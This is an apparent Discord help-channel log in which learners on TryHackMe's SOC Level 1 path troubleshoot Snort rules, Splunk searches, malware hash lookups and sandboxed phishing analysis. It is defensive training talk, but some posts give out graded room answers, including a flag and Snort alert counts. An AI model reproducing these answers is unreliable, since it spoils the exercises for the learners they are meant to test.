In the "Threat Intelligence Tools" room, is saving the malicious email attachment in the TryHackMe VM, getting the SHA256 sum with the command line tool, then removing the file a safe way to get the SHA256 hash to search on Talos? The VM isn't connected to the internet and it's basically just a sandbox, no? Even so, is there a safer way to get the hash?
#soc-level-1-path
It just feels really sketchy to save something you know is malware, even if it's in a sandbox and you don't open it. Maybe that's just a feeling you have to get accustomed to when learning blue team stuff? 😅
Hey there. I am currently doing the Kibana room. Looks like the answers to these questions have not been updated. It's only accepting old answers despite the fact that the VPN connection is showing different data, and based on that, it's not accepting those answers.
Hello @timid dew , Can you please also mention the room link, and the screenshot or evidence for us to replicate and figure out the issue and sort it. Thanks.
Trying to do Snort right now. The page itself is written as if there would be no other network traffic until you start the script, but there's a bunch, and it makes it a bit difficult to discern the traffic that supposedly comes from the script and check how the changes in use affect it.
Is that intentional/unavoidable?
What is a Wireshark filter that is not equal to tcp port 80?
I've tried != and !==, not working.
not tcp.port == 80
Heya. Can anyone recommend some Modules or Rooms where I can learn more about firewalls from a blue teaming perspective? Like how to set them up etc?
Hello Fellas, can someone help me access YARA LOKI?
Hi everyone, I'm doing the soc 1 learning path, but I'm interested in the 'Cyber Threat Intelligence' and 'Digital Forensics and Incident Response' modules. Should I follow the path as it is in THM or can I skip to those modules? I want to practice in Tryhackme because my college courses on these topics are mostly theoretical.
You can choose to do whichever modules you want. You don't have to follow any of the learning paths and can create your own bespoke path if desired.
Hi Turon, did you get an answer yet?
Can anyone help me with this question? I cannot find the answer. I even checked the writeups, but I think the room was updated because in the writeups the questions are different.
ca2dc5a3f94c4f19334cc8b68f256259 This is the MD5 hash of Redline
Room name: Intro to Malware Analysis
What question are you having an issue with?
Oh, I just figured it out, thanks.
Can anyone tell me what font is used in Brim, in the Brim room?
Hey guys, I am currently training to be a SOC analyst using the THM SOC 1 pathway.
Hello guys, I am on the Threat Intelligence Tools room and I want to download the 3 .eml files used for the task so that I can use PhishTool on my machine and analyze them. The problem is, I don't have the option to download those 3 .eml files. I think I am missing something obvious, but from what I found on the internet the room was created to self-download the files on the private machine.
You're not supposed to download them and use them on your host machine, that's why there is no internet connection on the virtual machine.
You need to use Thunderbird to open the e-mails.
Thank you @primal igloo. I saw from screenshots that before, it was available as a button (Download Task Files); that was very cool because it permitted people to self-analyse the file with whatever tool they wanted. Why is this no longer a possibility? I mean, even just for curiosity it would have been cool to analyse the emls.
These files could be malicious, so it's best to leave them in the sandboxed environment.
Okay, thank you @primal igloo🔥
https://tryhackme.com/room/windowslocalpersistence task 2; I don't get why I don't have the same outcome as the room...? Thanks
The one shown on the left is the AttackBox, which runs on Ubuntu, while you are trying to run it on your Windows target (via cmd).
So you recommend I get Ubuntu? What if I want to do it with the THM room, I can't?
You could do Ubuntu, Kali or even Parrot. Whichever is convenient to you at the moment.
Why doesn't it work? What is the other option? https://tryhackme.com/room/windowslocalpersistence task 2
Haven't done this room yet, but does thmuser1 supposedly have the access needed to extract SAM and SYSTEM files?
I managed to restart the machine, but then the Python script doesn't work.
Hey guys, I am having issues with Splunk. Search results are not populating https://tryhackme.com/room/splunk201?path=undefined
Did you wait around 15 minutes for the machine to fully spin up (including the services)?
Yes, I have been sitting here for the past 2hrs waiting for the results to pop up.
Will restart both machines
Still nothing. Does anyone have a fix for this?
Maybe try posting this in #room-bugs?
As far as I remember, I coped with it by sending the generated traffic to eth1 (the script for its generation sends traffic to eth0), then set Snort to read from eth1.
Guys, I'm on task 5 and for the questions it's asking me to use Thunderbird to analyse an email. When I open Thunderbird using the attached VM it's asking me to make an account. I don't want to make an account, and plus making an account on the attached VM would be useless because it resets every time. What should I do?
Just hit cancel.
Yeah, thanks. Watched a video and you don't even need an account to use Thunderbird.
Nah, it's only if you want to hook up your e-mail so you can use that client for all your e-mails instead of logging in to the website, i.e. Outlook.
ah gotchu
How do I fix this issue? The AttackBox is glitching when I try to launch the room inside of it. I need to drop the downloaded file into Splunk's Add Data, and I can't do that if I don't download the file first in the launched room, because when I click the download files it saves on my personal PC and I can't drop the file from my personal PC to the AttackBox.
How do I drop the file onto the AttackBox from my personal PC? Opening the room inside the AttackBox causes a glitch.
@pure crow @hazy surge have you completed the splunk201 room?
Can you help me with task 9 Q2?
I was able to complete Splunk Basics. There was a folder inside that you can access where the downloaded file is.
I'm not done yet on splunk201, brother. Currently doing it. Once I'm done I'll assist you.
I need help. I'm on premium for this month. I connect to the machine via VPN (sudo openvpn). It is connected, but when I try to put the IP (site) in the browser of my own machine it shows nothing. But when I access it via split screen the site will show. How do I solve this?
For reference, I am doing "Task 18 [Day 12] Defence in depth Sleighing Threats, One Layer at a Time" of Advent of Cyber 2023.
I can only view the site via the THM AttackBox and not on my machine, even though I am connected to the VPN.
VPN Server Name: EU-VIP-2
Internal Virtual IP Address: 10.14.72.187
Server status: Online
Connection: Connected
Did you SSH in to the machine as instructed?
Yes
Hi, help me.
I'm sure about the answer, but the THM web app says WRONG.
Room: Benign
Q: What is the URL that the infected host connected to?
A: https://controlc.com/548ab556
But it says no.
Can somebody help?
Please🥲
The link was expired so it was changed in the logs a few days ago. I have confirmed, the link within the logs that you will find works perfectly fine as of today. Please check again.
Folks don't usually give out answers directly as it defeats the purpose of the platform.
My friend has an interview coming up in the SOC field. The position mostly focuses on creating firewall rules, reverse engineering malware, and network security. He wants to know what rooms in THM would help him prepare for open-ended questions and technical ones as well.
Any advice would be appreciated.
The SOC L1 and L2 paths will help so much.
To complete these paths you need at least 1 month.
Depends on your intensity. I did it in 2 weeks.
And I could build my solid base from each of them.
You did both in 2 weeks?
No, SOC L1 in 2 weeks.
Then both will require at least a month.
Maybe, or more time, because SOC L2 has more difficult rooms than SOC L1.
As I said, it depends on intensity (time per day), willingness to learn, how quickly you get each domain.
Just finished the 2 prerequisite paths to this :), it's somewhat fun and interesting.
Hello all, I am currently in the Threat Intel Tools rooms and trying to do the phishing emails part. I am not entirely sure how to access the emails from the AttackBox to analyze them with PhishTool
Guys, what's the correct answer in room Benign - task 2 - last question?
Because this is not working (https://controlc.com/548ab556)
That's because it's wrong.
What are you using to search?
Nvm, I got it finally! 😄
Hello everyone, currently trying to finish up the Redline room but it's just taking forever for Redline to scan and import the analysis. This will be my 4th day or so trying to come back and finish it up because it takes so long to scan and import. I got an error not long ago for disk space being low as well when trying to import the analysis into Redline. Is it normally supposed to take an hour+ for it to scan? Then it takes 30 min+ to import the case. Thinking support may need to add more resources or something.
Hi
In Snort task 9 it asks me to create a Snort rule and I do exactly that, but it says "snort rule is missing port number". I literally don't have a port number. I have an IP ID but no port number. Anyone know why?
Hello guys
I need help
I am working on the Zeek room and the attack machine is so slow.
I have tried to scp the task files to my local machine so I can complete the task, but it's not working. Is there any other way to get the task files so I can use my local machine to complete the task? Help, guys.
let me check the room and try to give you help
I don’t know the exact room you’re going through but it may want you to find the port that a particular service is using. You could also use an arbitrary port number if it just wants you to create the rule for any port.
I’m not certain that’s the answer and I can’t check atm but it’s something to look into
Hope it helps!
I also did check the said question, but I didn't see it. What is the exact question? Also, you may need to investigate the pcap file to identify the port in question.
Hey guys, I have found a SOC 1 MISP module Task 5 Answer 1 "error", as I have found the ID associated with PupyRat, yet the field does not accept the value. Do you have any idea what might have gone wrong?
Hello, I am in the Yara room on tasks 8-9. There are several tasks concerning a file called index.php. Loki will run on it just fine, but when I look to run any other commands on it, like strings in task 9, the machine tells me that the file doesn't exist. Is there something I am missing? index.php does show up in the "ls" command to find the file.
I’ll check it out again later thanks!
It was bugged somehow, had to restart the attack box and the task machine
I'm in the exact same spot and I'm lost.
Threat Intelligence Tools Task 5 PhishTool. I'm a little annoyed that I can't get out to the internet from the AttackBox to analyze the email with PhishTool
I'm going to read the raw file for the answers anyway, but I'm still mad about it.
You need to use Thunderbird.
This is standard practice for sandboxed environments for potential harmful files.
Thank you. I read the email in vim to find it, but because of your message I went back and figured out how to find it in Thunderbird too, so thank you!
I'm just yapping because after reading all the info about PhishTool I assumed I would be using PhishTool too.
Hey all,
I'm in Snort Challenge - The Basics (Task 2). I need to investigate log files, but when I run ls, I do not see any.
Help me please!
In that folder there is a pcap file; do analyze that file.
Hi all,
Did anyone doing the Redline room in this path face an issue of running out of storage on the disk while waiting for the program to create the analysis out of the session file? I did everything as per the guide in the room.
My folder for the session was in Public Documents and it had around 10GB of data after the script was done and after I got that error from Redline.
I don't remember exactly, but I do remember that I ran out of space. I think there were 2 scans (1 made by me and 1 made by THM) and I deleted the one made by me and continued with the one provided by them.
Mmm, okay, I'll give it a try. Thanks for the reply.
Hello all. Why does my Snort keep printing "warning: no preprocessors configured for policy 0"? I'm in the Snort module, exercise 6.
Can you please let me know in brief?
It must have something to do with the rules file or path to the rules file. Can you provide a screenshot with more details and commands you ran?
The command that you need to run goes something like 'sudo snort -A full -r mx-3.pcap -c local.rules'. This will tell Snort to generate log files from the given pcap file that's in the directory for that task, and you will use the same logic for all other tasks that you face. Good luck.
Hey, just letting you know something seems to be amiss with the snortchallenges1 task 2 setup. When I interrogate the pcap, setting the number of packets to 65, I get the following as the last packet output (should be packet 65, no?):
However when I enter the values listed for the questions relating to packet 65, I'm being told the answers are incorrect
As a sanity check I visited this write up https://medium.com/@huglertomgaw/snort-challenge-the-basics-tryhackme-225c332b50ac where I see completely different values for packet 65 but they are accepted as correct.
Command I'm using is nothing fancy: sudo snort -r mx-3.pcap -n 65
Either something's borked somewhere, or I'm doing something wrong, and hey, I've been known to make a mistake or two so it could be possible, but from what I understand from the Snort rooms, my command should expose packet 65 as the last packet output from the snort command.
Also, I chose packet 65 as an example, there are other questions for which the details in the packets I arrive at are not accepted as the correct answer.
How many alerts are you getting
Hey all!
I'm trying to get the signature logs. I did create signature rule as well for the task-5 to find the source IP. When I do ls, I do not see the signature.log files. Any help.
NVM! I found the mistake. I should include signature as well in the zeek command
zeek -C -r http.pcap -s http-password.sig
Well, that was another oddity. Because I did the rule wrong initially and only filtered for outbound connections to port 80, I saw 164 alerts, put it in as my answer and it was accepted. Then I fixed the rule and re-ran Snort and received the expected number of alerts: 328. I'm not sure if the room would have accepted that answer since I had already entered the outbound-only figure and it was accepted.
I am still not understanding how to analyse the emails in the Threat Intelligence room for Scenario 1 and 2. How am I supposed to check the attachments for the emails if I cant access internet?
Have you tried copying the file to your local machine and installing Thunderbird (to open the email)?
No? Why would I do that?
If the machine doesn't have a connection, it's because the files are not supposed to move from it.
i.e. phishing emails etc.
Just saw a video where someone just started up a web server on that machine and downloaded the files to the attack box to be able to upload. I think I'm just going to follow that unless someone knows a better way
I'm facing a problem with the hash value. I mean:
Question: Analyse the report associated with the hash "b8ef959a9176aef07fdca8705254a163b50b49a17217a4ff0107487f59d4a35d" here. What is the filename of the sample?
I'm not getting what it is asking me to do.
If anyone has gone through this, please explain what exactly it is asking.
VirusTotal > DETAILS > Names.
Ahh...thanks
got it
Pyramid of Pain > domain name > requesting me to provide the first suspicious URL request I'm seeing in the report.
Can anyone help me with where exactly I find the URL request?
@primal igloo bro, can you please help? If you can take out some time it will be very helpful for me 🙂
Have a look at these tabs.
I got it earlier. I don't know how I took so much time on this small stuff.
Btw, thank you.
Hello, I'm in the Brim room and I don't know if it is normal for the "Example Query" column not to display examples? Only when I highlight them.
Noticed this too, I imagine it's unintentional and a bug
Also noticed what I believe to be an incorrect answer in the wiresharktrafficanalysis (3rd of the wireshark trio). In task2 a question is asked like so: "Which scan type is used to scan the TCP port 80?" So I follow the relevant stream and got the following result:
According to notes (and my acquired knowledge) that's a TCP SYN Scan:
But the expected answer is TCP Connect, which is incorrect:
Why can't I upload a pic here?
Security operations practical exam. How do I know the port number, just guess? The source IP and destination IP numbers are clear. Thanks.
You need to verify
@fast girder
for example
Hello everyone, I am looking for advice: I am currently doing the SOC1 course, but at the same time I am studying for the CompTIA Security+ 701 exam, and I feel somewhat overwhelmed due to the fact that I am trying to build my skills. But is building the skills the better option than studying for an exam? If this makes sense.
I’m in kind of the same situation, have you spent time familiarizing yourself with other parts of the exam?
I have
Maybe I'm overthinking the process.
In my opinion, after just having completed my Sec+ last week and jumping right into the SOC 1 pathway, I would recommend doing your Sec+ first. I would say the most obvious difference is that one is concepts and processes and the other is the tools themselves.
I would think logically: learning about processes and their overall roles in the cybersecurity mindset, then learning the actual tools that can be effectively used in them.
Just IMO
Thanks for the advice.
Hello, I'm having problems starting Yara Task 8. Is anyone having problems starting Yara? I tried several combinations on how to start it and none of what I tried seem to work.
Ok thank you @tepid hill
Anyone else's grim whois lookup not working?
Hey all!
I'm currently working through the SOC Analyst Level 1 path, and have come across an issue with the "Snort" room machine.
I had done task 4 fine, closed my browser and came back to it later in the day. Now, no matter what flags I add when running Snort, or whether I run it with sudo or not, I'm getting pages and pages of errors similar to the below:
WARNING: No preprocessors configured for policy 0.
04/11-13:52:20.828796 10.100.1.202:49284 -> 10.10.137.124:80
TCP TTL:64 TOS:0x0 ID:2911 IpLen:20 DgmLen:84 DF
AP Seq: 0x700B6427 Ack: 0xAFB00F0C Win: 0x183F TcpLen: 32
TCP Options (3) => NOP NOP TS: 1901165899 3098964094
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
(snort_decoder) WARNING: IP dgm len > captured len
WARNING: No preprocessors configured for policy 0.
WARNING: No preprocessors configured for policy 0.
04/11-13:52:20.829789 10.100.1.202:49284 -> 10.10.137.124:80
TCP TTL:64 TOS:0x0 ID:2912 IpLen:20 DgmLen:52 DF
A* Seq: 0x700B6447 Ack: 0xAFB0525A Win: 0x17EF TcpLen: 32
TCP Options (3) => NOP NOP TS: 1901165900 3098964103
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Am I doing something silly/missing something obvious, or is there a problem with the machine?
Thanks! 😄
Oh, those aren't actually errors. That's Snort actively scanning. If you do ctrl + shift + c it should end the scanning process and give you a Snort log.
Basically the longer you let it scan the more network traffic is gonna be scanned
Thank you, I thought that might be the case! It was throwing me off as my results didn’t look like the images in the room! Will have another crack tomorrow and smash the room out 💪🏻
You’re welcome. If you have any problems feel free to ping me
Good night
I have a problem
I'm studying SOC Level 1 - Snort.
The machine has a script "traffic-generator.sh", but when you run it, it returns this error:
Error constructing proxy for org.gnome.Terminal:/org/gnome/Terminal/Factory0: Error calling StartServiceByName for org.gnome.Terminal: Timeout was reached
Do you know how to solve it or if I can talk to someone about it?
Are you running the traffic generator script right?
Is this right?
What's right?
Error constructing proxy for org.gnome.Terminal:/org/gnome/Terminal/Factory0: Error calling StartServiceByName for org.gnome.Terminal: Timeout was reached
I can't generate traffic
Going through the Wireshark: Packet Operations room. Can someone please explain why the display filter for the last question in task 5 would be dns.qry.type == 1 && dns.flags.response == 1 and not dns.qry.type == 1, when the question says "What is the number of "type A DNS Queries"?
Wait, forget about that, now im also confused.
I believe one of the queries counts requests AND responses and the other only counts responses
There should be roughly double the count when counting both queries and responses
(correct_answer * 2) != correct_answer
Just finished level-1 path woot woot!
Hello i'm on the Velociraptor rooms and I don't understand something.
Why, with the VQL Drilldown, does the graph appear like the picture? The data goes back in time? Is it a display bug?
Hey, anyone here who can help out with task 9 Pyramid of Pain? Please DM.
Send the doubt.
Hello guys, the Redline room is taking forever. Is there any way to take the session and run it on my computer?
Hey guys, maybe for most of you this question will be "laughable", but I'm really a beginner in this world and I'm doing SOC Level 1 - Pyramid of Pain: Task 9, where I have to match sentences to the Pyramid of Pain. In my (beginner) logic, how I matched the sentences to the pyramid is the way to go, but it's sadly wrong and I would need some help with this task.
Maybe there is someone who can help me with it?
Thanks all
yeah it is really slow. Then when it does create the analysis files I get an error loading them. Have tried a few VM restarts. Have moved on for now. Will come back at the end of the path and try again.
Had something similar. Can't explain why, but just so you know, it's not you.
Velociraptor Room https://tryhackme.com/r/room/velociraptorhp
Task 4 - I don't see the KapeFiles Artifacts to select for new collection
I have completed the rest of the room but unable to get my instance to match the screenshots or steps of Task 4. The task calls for creating a New Collection based on the "Windows.KapeFiles.Targets" Artifacts and shows 3 search returns that have Windows in the results. I don't have any windows or kape results in my search (screenshot attached).
Have tried 4 different VM restarts over 2 days.
Not sure where to take that one next.
Ideas?
nooco — today at 18:26 @#room-help
Hey!
First of all, thank you for creating the room:
Snort Challenge - The Basics.
I have a difficulty with task 2 - question 1 about "Write rule to detect all 80 TCP port traffic."
Could it be that TryHackMe does not accept the correct answer or is it really wrong 🙂 ?
Greetings from Germany
For the task 9 of the pyramid of pain. The flag is ||THM{PYRAMIDS_COMPLETE}||
I've just tried it again and got the THM 'right' answer. If you want to share your snort rule we can compare for any differences.
Some people don't want the answer, so please place the answer between || to hide it
Don't get what you mean?
You spoil the answer; hide it so people who want to learn aren't shown the leaked answer.
Okay.
|| HIDE THE ANSWER USING DOUBLE PIPE ||
Done that. Thank you
Thanks mickc. I helped myself out and found a post from nelbert:
nelbert — 15.04.2024 17:05
Update: dug around and looked, and it seems that using the bidirectional operator (<>) generates two alerts for packets depending on how you write the rules. It looks like ||328|| was previously accepted by THM as the correct answer but this must have been updated. ||Changing the rules to use -> instead of <> generates half the alerts (164) which is now accepted as the correct answer.||
Hi !
the snort room is easy if you understand how to write rules !
If you have some difficulties, ping me and I'll help you 😉
Hi! Can someone explain why my answer: 328 on how many packets is captured on the Snort Challenge - task 2 is wrong? (Resolved)
Hi guys, I'm struggling with Task 2- Writing IDS Rules(HTTP) in SOC Level 1 Snort Challenge - The Basics. First question: "What is the number of detected packets?", I got 328 but the answer is incorrect, i googled it and it seems the other get also the 328, can someone help me about that? (Resolved)
Hey, i actually solved it. Look carefully for TCP packets and not the total packets
Guys, good night.
Guys
Help me please
Can anyone help me with task 9 of the Pyramid of Pain?
I'm not able to do task 9 because I'm Brazilian and I don't speak much English.
The attacker has utilised these to accomplish their objective.
The attackers plans and objectives.
These signatures can be used to attribute payloads and artefacts to an actor.
An attacker has purchased this and used it in a typo-squatting campaign.
These addresses can be used to identify the infrastructure an attacker is using for their campaign.
These artefacts can present themselves as C2 traffic for example.
1 - TTP
2 - Tools
3 - Network
4 - Domain Names
5 - IP addresses
6 - Hash values
Can anyone please answer me?
wow, the task was different when i solved it
TTPs - Obviously plans and objectives. The name Tactics, Techniques and Procedures speaks for itself.
Tools - They are utilized to accomplish the objective. Different tools allow an adversary different opportunities. But the common thing of them is exploiting and gaining access.
Network Artifacts - These are the artifacts over the network such as user-agent string, C2 info, or URI patterns. If we detect them, we can block them, which will give a rough time for an adversary.
The rest, try to figure out yourself :)
Thanks bro!!!
I've heard about Clonezilla, but you can ask someone more experienced than me.
I prefer FTK Imager Lite if you need to take a full disk image on a live system. If you need a full disk image of an offline system I would recommend using a boot disk like Paladin or CAINE, assuming you aren't pulling the internal hard drive. Otherwise, if you don't need a full disk image and just want to get the artifacts you need for analysis, I would recommend using KAPE, which has various modules to collect specific artifacts and process the data using Eric Zimmerman's EZ tools.
Hey everyone, I am working on the Snort Challenge - The Basics in the SOC 1 path. How do I get the Snort log to display the msg from the rule? No matter how I'm reading the snort.logs I never see the msg "TCP request detected" (or whatever the msg might be). I am using "sudo snort -r snort.log.2714856" to read them. Are there other ways to better read these?
If that's all you're typing, you're forgetting to apply the custom rule that you make with -c snort.local (and also put -A console if you only want to output results to the console, or -l . if you want to save the report to your current directory).
I just finished the three snort rooms and just wanted to say I actually enjoyed them 🙂 they're pretty engaging and hands on, it was fun
-TTP: The attackers plans and objectives.
-TOOLS: The attacker has utilised these to accomplish their objective.
-NETWORK: These artefacts can present themselves as C2 traffic for example.
-DOMAIN NAMES: An attacker has purchased this and used it in a typo-squatting campaign.
-IP ADDRESSES: These addresses can be used to identify the infrastructure an attacker is using for their campaign.
-HASH VALUES: These signatures can be used to attribute payloads and artefacts to an actor.
Come here when you are tired of researching, analyzing and thinking.
Snort Challenge - The Basics: - Task 2 Question 1:
I've made the correct rule for detecting packets incoming and outgoing on port 80, have run Snort and generated a log file, and have a result. I've double checked the result against multiple walkthroughs as I was sure I am doing it right, and they agree with my answer, yet THM is still saying that the answer is incorrect?
Any advice?
Thanks nooco, this fixed it!
Can anyone confirm that difference between -> and <>?
I assume -> is "server to client" and <> is both directions?
Does this double the amount of detected packets as it's detecting both directions of data during a TCP handshake?
definitely enjoyed doing it

another one sticks in the tar pit... yeah the correct answer can be seen in the command output or you need to rewrite your rules in another way
It seems that when I run Snort with the same rules file it's throwing up different results each time. Is this the correct behaviour?
Onto Task 3 now, and yeah, I can run Snort twice straight after one another and I'm getting a different number of "Total" packets each time?
well then your rule is somehow funky
Hello!
I am in the Threat Intelligence Tools room, currently on Task #5 "PhishTool", and the questions indicate that I should use the PhishTool website which the task had me create an account with to solve the problems... but the VM isn't connected to the internet. What's the deal with that? How am I expected to analyze the file with no further instructions and no internet access on the VM?
I always feel like there a things missing from these TryHackMe rooms but maybe I'm just not used to how things work on this platform. Just seems odd that I should always have to dig into a Medium article/writeup to get the information I need. I know that prompts investigation but it seems like I'm constantly digging off site for answers and that not enough pointers are provided. Any help is appreciated.
I'm going to crosspost in #room-help so feel free to flag me or whatever I just don't know where to seek help for this stuff because the TryHackMe website just asks me to go on Discord.
You don't need to use PhishTool at all; it's an example of what you could use. However, as you're working with potentially dangerous files, your external network is cut to help protect you and the network.
The task material states to use Thunderbird Mail for the e-mails.
Has anyone else had a problem with the Sysmon VM not working?
Hello @vital bluff I just checked - the VM is up and running within 3 minutes and working just fine - Can you check again and let me know if the issue persists on your end?
At first I tried restarting the machine a couple of times, waiting the recommended 5 mins with no luck, and I gave up. A couple of hours later I tried again and it worked like a charm!
Hello everyone. I got a question: is there a big difference between SIEM and EDR? Especially if we are talking about Splunk and Wazuh. Both collect logs that can be analyzed in both instances. Can anyone clear this up for me?
Check Point Software: Learn about endpoint detection and response (EDR) and security information and event management (SIEM), two methods to fulfill different roles.
appreciate it!
I wanted to use my own words to differentiate it, but then again, these experts can do it that much better.
Does anyone know if there is an issue in the Snort Writing IDS Rules (HTTP) task? I have run my rules and it shows 328 packets; I input that in the answer field and it comes up incorrect. I have reluctantly looked through the writeups and the same answer I'm typing is what is getting credit in the writeups.
There is no issue with the room and your answer is in fact wrong.
If you compare this (from https://tryhackme.com/r/room/snort) to the rules you use, what are your rules actually matching? (edit: given that this is a week old, probably clear by now)
I'm having the same problem
Nvm
I got correct one
I changed the rules
Change first rule direction to source to destination and second one to bidirectional
Btw where to choose roles ? @royal basin
I was confused because those online answers were wrong too
That might accidentally work out here but it still makes no sense to use the bidirectional operator when the rules themselves already match both directions.
so i have to use -> for 2nd one too?
That is because the room used to be wrong and was then corrected. The walk-throughs were never updated. But heads up: The room author only corrected task 2 question 1. For the rest of the questions and task 3 (ftp afair) you better still follow the walk-throughs because if you do it right, your answers won't be accepted.
?
It said there is no <- sign in snort
So that's why I used bi directional
@royal basin btw where is the role channel? I can't find it
You verify for roles.
Thanks
Hey I'm doing the same tasks we can both solve together if you like
@royal basin can I ssh into snort rooms? My wifi is trash and browser vm is slow as fk
I actually figured it out based off the help I received. I finally realized what I had done wrong. The snort stuff was wicked fun
I figured it out and feel dumb for asking. Thank you @royal basin
Gave +1 Rep to @royal basin (current: #269 - 19)
You completed the snort challenge basics room?
Hi, shouldn't the answer be ||2||?
Which ControlSet contains the last known good configuration?
||and ControlSet002 will be the last known good configuration.||
hey is there a bug in Threat Intelligence Tools under Cisco Talos Intelligence with Whois search
What’s the bug?
Does it give you ssh credentials?
If so then yes
no
Then you probably can’t ssh into it
you can no longer do the whois search
Which task?
Task 6
2nd question
it works on other websites like: https://www.whois.com/whois/204.93.183.11
I'll let staff know.
but for some reason not on talos
Research domain ownership with Whois Lookup: Get ownership info, IP address history, rank, traffic, SEO & more. Find available domains & domains for sale.
ah yes talos
kinda messy to find some results depending on which talos page you are on
it has changed a bit comparing to the photos form task
hey
anyone good at command line searching event logs? i need a hand to get to the answers for Windows Events Log room
this stuff has way toooooo many options
so the question goes like this
'A Log clear event was recorded. What is the 'Event Record ID'?'
can't seem to find my way in searching for it correctly
Either the windows built in event viewer (or whatever is the exact name) or you can try Zimmerman's suit of tools that include one to export windows event logs to text files.
well the goal of this room is to find what you're looking for with Get-WinEvent
Get-WinEvent -path .\Desktop\merged.evtx | Where-Object{$_.Message -Like "Log clear"}
This does just nothing and the machine is like hanging
until i CTRL-C
? no answer?
Still an open question? The answer is in the room text if you read it carefully.
HEY in rooms benign i cant connect to splunk
http://10.10.126.111:8000/ i try this from the attack box but unable to connect.. what am i doing wrong?
found what - didn't need the 8000
Splunk: Setting up a SOC Lab
task 3
I type the following into the browser: http://coffely:8000/
nothing happens. I have spent the last 3 hours on this room and nothing works. Is there a customer service number for TryHackMe?
Incident handling with Splunk - I'm probably being dense, but i've started the machine, started the attackbox, connected to the machines IP and the Splunk dashboard is showing, but there doesn't seem to be any data in Splunk? I've searched through all the Rooms folders and can't see anything relevant either, any help would be greatly appreciated 🙂
Ignore me, just needed to search for "index=botsv1 imreallynotbatman.com"
As expected, I am dumb 😂
To anyone with a voucher and will love to give it away , I am kindly asking for it, so I could continue my learning for the SOC t1 please
unrelated but where did you gain the sec+ & cysa role?
This task requires us to follow the steps and install Splunk and then we can access it via the link http://coffely:8000/. Are you sure, you have followed all the steps correctly? Can you double check and respond.
is there an issue with Snort Challenge - The Basics Task 2 and Task 3? The IP addresses clearly show what they are, but the input is not taking it. Questions 2, 3 and 4. And for task 3 the total amount is not being accepted... found out it was worded incorrectly
for task 5 in the SOC1 Threat Intelligence Tools room, do I need to set up Thunderbird on my system and do SSH to get the emails, or just make an account and use the split screen?
No, when you open thunderbird just hit cancel.
ok and now?
Open the emails?
Morning all!
In the Redline Room, I'm struggling to get the analysis stage to work properly.
I have created the Redline script exactly how task 2 details, run the script as administrator, waited for it to finish.
When opening the "AnalysisSession1.mans," the analysis does not have any analysis data.
The only things in the left pane are Timeline, Tags and Comments, and Acquisition History.
I've restarted the machine multiple times, and have tried across the last few days, and get the same result every time.
Anyone aware of something I might be doing wrong or could this be some kind of bug?
The Analysis folder I create is over 7GB, so that would indicate that something is there?
Got hit by loki requesting root for a full analysis is that normal?
Can you link the room?
task 8
the zeek room was kind of a beast but i enjoyed that
Hello everyone,
I am currently taking the "Incident Handling with Splunk" course and I am stuck on the part where I need to detect the correct password for Joomla administration. I used this query:
index=botsv1 sourcetype=stream:http dest_ip="192.168.250.70" http_method=POST uri="/joomla/administrator/index.php" form_data=*username*passwd*
| table _time uri src_ip dest_ip form_data
This gives me the passwords that the attacker used to attempt to access Joomla. Can you please help me? Thank you in advance.
I started this path a month ago and I finished it there was so much time spent boggling my mind but like that's how I learn. I just wanted to say for anyone on the fence about THM it is insanely helpful, for me it gave me a new side of cybersecurity I didn't know about and I found a real passion for threat intel/malware analysis/reverse engineering mostly from getting on the cyber side of youtube but if it weren't for THM I wouldn't have known where to start and would've definitely been a much more confusing process
Hi.. want to ask... the answer is in the attackbox.. but it's considered incorrect? and I did double check with some writeups and walkthroughs too. I did it correctly. but why is it wrong? hahaha
anyone have this issue?
what command / rulesets did you use
the ip should start with 216.
alert tcp any any <> any 80 (msg: "found"; sid: 100001; rev:1;)
alert tcp any 80 <> any any (msg: "found"; sid: 100002; rev:1;)
sudo snort -c local.rules -r mx-3.pcap -A full -l .
I am having this same issue, I even looked at about 5 write-ups and they all used the same rules: alert TCP any 80 <> any any (msg: "Task 2"; sid: 1000001; rev: 1;)
alert TCP any any <> any 80 (msg: "Task 2"; sid: 1000002; rev: 1;) and commands: snort -c local.rules -A full -l . -r mx-3.pcap, snort -r snort.log.1687945949 -n 65.
Good evening everyone, I hope you're all well. I have a problem in the ItsyBitsy room, when I launch elastic, I'm not asked for a login or password and I access the empty elastic with no data to process. Has this ever happened to you? Have I missed something? Thanks in advance!
Try changing Elastic date/time to get the data.
ok.. basically.. i solve it myself... lol.....
it just needs a single-line rule.. the walk-through uses 2 rules.. which I don't understand why 2.
but just use a single rule.. + the given msg "<as in bold text>", then you're good to find out the answer
its funny.. is that.. after i post it here.. i found the answer by my ownself. hahahaha..
Ok i got it, i had to change date to 3 years ago 😂, thanks for your help guys
Yes, initially I had the same confusion then figured it out. 😁
Hey everyone
I had a question regarding " For Threat Intelligence Tools, Scenario 1" question 2 where it asks "From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..."
I had acquired the hash for both the email and the attachment and placed both of them into Talos File Reputation, but none of the Detection Alias options start with an "H"
I would appreciate any help or guidance on where I should be looking, or advice on any mistakes I am making
snort
Having the same issue also, not sure if you figured it out but I have reset the room 6 times and seems to be a bug.
Snort
Can anyone suggest me where not to waste much time (on silly things in some rooms) in the path ?
I am feeling like I am wasting my time on some room that I shouldn't.
which one ?
Where do you get certs that look like that lol
~~Also in Threat Intelligence Tools's Scenario 1, ~~
"From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..." this cannot be found anymore I think..
I've looked up the answer and I can't find it anywhere, I've changed Talos and VT
~~https://tryhackme.com/r/room/threatinteltools~~
I'm wrong.
On tryhackme room when you finish all the tasks. 😀
The ones I have look different...
They look like this for example
I don't know,tryhackme gave me that one.
yeah they updated the look some time ago
The early ones are like yours
mine are old school
yep
don't think they have implemented that renewal of the cert images/generation of new certs
I dont't think it's because of the points/level you have
I know, but just happy about that
@tender salmon Search the attachments hash on virus total.
I did, it didn't show the expected result
MalwareBazaar just didn't give ANY result, Talos gave some but the one
Looked at screenshots of write-ups, the hashes did match so I didn't mess that up
I just searched the md5sum of the attachment and got the answer.
I did the SHA256 as requested by websites
Just checked that too, got a match.
Share screenshot in DMs?
I was looking at the wrong colom on VT...
I don't wanna talk about it
lol, glad you got the answer.
Loki is throwing some errors
https://tryhackme.com/r/room/yara
```
